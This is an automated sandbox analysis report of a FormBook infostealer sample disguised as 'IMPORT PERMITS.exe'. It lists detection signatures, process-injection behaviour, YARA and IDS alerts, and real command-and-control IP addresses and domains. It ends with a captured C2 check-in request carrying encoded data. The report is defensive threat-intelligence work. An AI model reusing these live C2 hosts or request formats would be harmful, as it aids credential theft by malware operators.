Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMPORT PERMITS.exe

Overview

General Information

Sample name:IMPORT PERMITS.exe
Analysis ID:1547340
MD5:b648db78eac01c6c7311e34d232b4ed7
SHA1:3efe3363ea8f532301252ac23c0b0df116836e67
SHA256:1eef3c00ea6fe6b3e757e7ee213f2cf19a76cb290ceb108b5dc63fe7eb86012c
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • IMPORT PERMITS.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\IMPORT PERMITS.exe" MD5: B648DB78EAC01C6C7311E34D232B4ED7)
    • IMPORT PERMITS.exe (PID: 2032 cmdline: "C:\Users\user\Desktop\IMPORT PERMITS.exe" MD5: B648DB78EAC01C6C7311E34D232B4ED7)
      • gKZXbGXeVZyo.exe (PID: 4020 cmdline: "C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PATHPING.EXE (PID: 5844 cmdline: "C:\Windows\SysWOW64\PATHPING.EXE" MD5: 078AD26F906EF2AC1661FCAC84084256)
          • gKZXbGXeVZyo.exe (PID: 3512 cmdline: "C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2364 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.IMPORT PERMITS.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.IMPORT PERMITS.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-02T08:11:15.071202+010020229301A Network Trojan was detected4.175.87.197443192.168.2.449735TCP
                2024-11-02T08:11:40.879537+010020229301A Network Trojan was detected52.149.20.212443192.168.2.465456TCP
                2024-11-02T08:11:42.331245+010020229301A Network Trojan was detected52.149.20.212443192.168.2.465457TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-02T08:11:48.187130+010020507451Malware Command and Control Activity Detected192.168.2.4654583.33.130.19080TCP
                2024-11-02T08:12:11.647489+010020507451Malware Command and Control Activity Detected192.168.2.449155172.67.131.3280TCP
                2024-11-02T08:12:27.377474+010020507451Malware Command and Control Activity Detected192.168.2.449236103.191.208.13780TCP
                2024-11-02T08:12:50.205320+010020507451Malware Command and Control Activity Detected192.168.2.4493523.33.130.19080TCP
                2024-11-02T08:13:03.761774+010020507451Malware Command and Control Activity Detected192.168.2.4493563.33.130.19080TCP
                2024-11-02T08:13:17.596335+010020507451Malware Command and Control Activity Detected192.168.2.44936038.47.232.16080TCP
                2024-11-02T08:13:32.065334+010020507451Malware Command and Control Activity Detected192.168.2.44936434.92.109.13180TCP
                2024-11-02T08:13:45.573385+010020507451Malware Command and Control Activity Detected192.168.2.449368162.0.211.14380TCP
                2024-11-02T08:13:59.268290+010020507451Malware Command and Control Activity Detected192.168.2.449372195.110.124.13380TCP
                2024-11-02T08:14:13.000112+010020507451Malware Command and Control Activity Detected192.168.2.449376185.68.16.9480TCP
                2024-11-02T08:14:28.163661+010020507451Malware Command and Control Activity Detected192.168.2.449380163.44.176.1280TCP
                2024-11-02T08:14:41.739639+010020507451Malware Command and Control Activity Detected192.168.2.449384199.59.243.22780TCP
                2024-11-02T08:14:56.690300+010020507451Malware Command and Control Activity Detected192.168.2.449388103.233.82.5880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-02T08:11:48.187130+010028554651A Network Trojan was detected192.168.2.4654583.33.130.19080TCP
                2024-11-02T08:12:11.647489+010028554651A Network Trojan was detected192.168.2.449155172.67.131.3280TCP
                2024-11-02T08:12:27.377474+010028554651A Network Trojan was detected192.168.2.449236103.191.208.13780TCP
                2024-11-02T08:12:50.205320+010028554651A Network Trojan was detected192.168.2.4493523.33.130.19080TCP
                2024-11-02T08:13:03.761774+010028554651A Network Trojan was detected192.168.2.4493563.33.130.19080TCP
                2024-11-02T08:13:17.596335+010028554651A Network Trojan was detected192.168.2.44936038.47.232.16080TCP
                2024-11-02T08:13:32.065334+010028554651A Network Trojan was detected192.168.2.44936434.92.109.13180TCP
                2024-11-02T08:13:45.573385+010028554651A Network Trojan was detected192.168.2.449368162.0.211.14380TCP
                2024-11-02T08:13:59.268290+010028554651A Network Trojan was detected192.168.2.449372195.110.124.13380TCP
                2024-11-02T08:14:13.000112+010028554651A Network Trojan was detected192.168.2.449376185.68.16.9480TCP
                2024-11-02T08:14:28.163661+010028554651A Network Trojan was detected192.168.2.449380163.44.176.1280TCP
                2024-11-02T08:14:41.739639+010028554651A Network Trojan was detected192.168.2.449384199.59.243.22780TCP
                2024-11-02T08:14:56.690300+010028554651A Network Trojan was detected192.168.2.449388103.233.82.5880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-02T08:10:59.878096+010028554641A Network Trojan was detected192.168.2.449389216.219.93.1780TCP
                2024-11-02T08:12:03.991850+010028554641A Network Trojan was detected192.168.2.465495172.67.131.3280TCP
                2024-11-02T08:12:06.533842+010028554641A Network Trojan was detected192.168.2.465510172.67.131.3280TCP
                2024-11-02T08:12:09.071921+010028554641A Network Trojan was detected192.168.2.465522172.67.131.3280TCP
                2024-11-02T08:12:19.003440+010028554641A Network Trojan was detected192.168.2.449191103.191.208.13780TCP
                2024-11-02T08:12:21.549456+010028554641A Network Trojan was detected192.168.2.449207103.191.208.13780TCP
                2024-11-02T08:12:24.096413+010028554641A Network Trojan was detected192.168.2.449221103.191.208.13780TCP
                2024-11-02T08:12:41.641466+010028554641A Network Trojan was detected192.168.2.4493203.33.130.19080TCP
                2024-11-02T08:12:45.069257+010028554641A Network Trojan was detected192.168.2.4493333.33.130.19080TCP
                2024-11-02T08:12:47.612436+010028554641A Network Trojan was detected192.168.2.4493433.33.130.19080TCP
                2024-11-02T08:12:56.018224+010028554641A Network Trojan was detected192.168.2.4493533.33.130.19080TCP
                2024-11-02T08:12:58.570549+010028554641A Network Trojan was detected192.168.2.4493543.33.130.19080TCP
                2024-11-02T08:13:01.288609+010028554641A Network Trojan was detected192.168.2.4493553.33.130.19080TCP
                2024-11-02T08:13:10.087282+010028554641A Network Trojan was detected192.168.2.44935738.47.232.16080TCP
                2024-11-02T08:13:12.971506+010028554641A Network Trojan was detected192.168.2.44935838.47.232.16080TCP
                2024-11-02T08:13:15.330687+010028554641A Network Trojan was detected192.168.2.44935938.47.232.16080TCP
                2024-11-02T08:13:24.458604+010028554641A Network Trojan was detected192.168.2.44936134.92.109.13180TCP
                2024-11-02T08:13:26.971383+010028554641A Network Trojan was detected192.168.2.44936234.92.109.13180TCP
                2024-11-02T08:13:29.424467+010028554641A Network Trojan was detected192.168.2.44936334.92.109.13180TCP
                2024-11-02T08:13:37.859117+010028554641A Network Trojan was detected192.168.2.449365162.0.211.14380TCP
                2024-11-02T08:13:40.407355+010028554641A Network Trojan was detected192.168.2.449366162.0.211.14380TCP
                2024-11-02T08:13:43.042243+010028554641A Network Trojan was detected192.168.2.449367162.0.211.14380TCP
                2024-11-02T08:13:51.622380+010028554641A Network Trojan was detected192.168.2.449369195.110.124.13380TCP
                2024-11-02T08:13:54.215448+010028554641A Network Trojan was detected192.168.2.449370195.110.124.13380TCP
                2024-11-02T08:13:56.693329+010028554641A Network Trojan was detected192.168.2.449371195.110.124.13380TCP
                2024-11-02T08:14:05.362082+010028554641A Network Trojan was detected192.168.2.449373185.68.16.9480TCP
                2024-11-02T08:14:08.037680+010028554641A Network Trojan was detected192.168.2.449374185.68.16.9480TCP
                2024-11-02T08:14:10.552132+010028554641A Network Trojan was detected192.168.2.449375185.68.16.9480TCP
                2024-11-02T08:14:19.625515+010028554641A Network Trojan was detected192.168.2.449377163.44.176.1280TCP
                2024-11-02T08:14:22.198624+010028554641A Network Trojan was detected192.168.2.449378163.44.176.1280TCP
                2024-11-02T08:14:24.717662+010028554641A Network Trojan was detected192.168.2.449379163.44.176.1280TCP
                2024-11-02T08:14:34.038547+010028554641A Network Trojan was detected192.168.2.449381199.59.243.22780TCP
                2024-11-02T08:14:36.590786+010028554641A Network Trojan was detected192.168.2.449382199.59.243.22780TCP
                2024-11-02T08:14:39.166080+010028554641A Network Trojan was detected192.168.2.449383199.59.243.22780TCP
                2024-11-02T08:14:48.893588+010028554641A Network Trojan was detected192.168.2.449385103.233.82.5880TCP
                2024-11-02T08:14:51.440454+010028554641A Network Trojan was detected192.168.2.449386103.233.82.5880TCP
                2024-11-02T08:14:53.987224+010028554641A Network Trojan was detected192.168.2.449387103.233.82.5880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: IMPORT PERMITS.exeReversingLabs: Detection: 68%
                Source: IMPORT PERMITS.exeVirustotal: Detection: 55%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: IMPORT PERMITS.exeJoe Sandbox ML: detected
                Source: IMPORT PERMITS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: IMPORT PERMITS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: GPUK.pdbSHA256 source: IMPORT PERMITS.exe
                Source: Binary string: pathping.pdb source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gKZXbGXeVZyo.exe, 00000006.00000000.1970482596.000000000071E000.00000002.00000001.01000000.0000000C.sdmp, gKZXbGXeVZyo.exe, 00000008.00000000.2122498147.000000000071E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IMPORT PERMITS.exe, IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: GPUK.pdb source: IMPORT PERMITS.exe
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 7_2_0041C160 FindFirstFileW,FindNextFileW,FindClose,7_2_0041C160
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 4x nop then xor eax, eax7_2_00409DD0
                Source: C:\Windows\SysWOW64\PATHPING.EXECode function: 4x nop then mov ebx, 00000004h7_2_02B004DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:65458 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:65458 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65495 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65510 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49155 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49155 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49191 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49207 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49236 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49221 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49236 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65522 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49320 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49333 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49352 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49352 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49357 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49353 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49365 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49381 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49354 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49366 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49361 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49382 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49343 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49368 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49359 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49355 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49360 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49369 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49360 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49386 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49368 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49363 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49364 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49364 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49371 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49376 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49376 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49367 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49375 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49358 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49378 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49372 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49372 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49388 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49388 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49379 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49385 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49384 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49384 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49356 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49356 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49374 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49387 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49373 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49370 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49377 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49362 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49380 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49380 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49383 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49389 -> 216.219.93.17:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.deepfy.xyz
                Source: DNS query: www.cmdh1c.xyz
                Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
                Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:65456
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49735
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:65457
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /a1y9/?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.litsgs.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
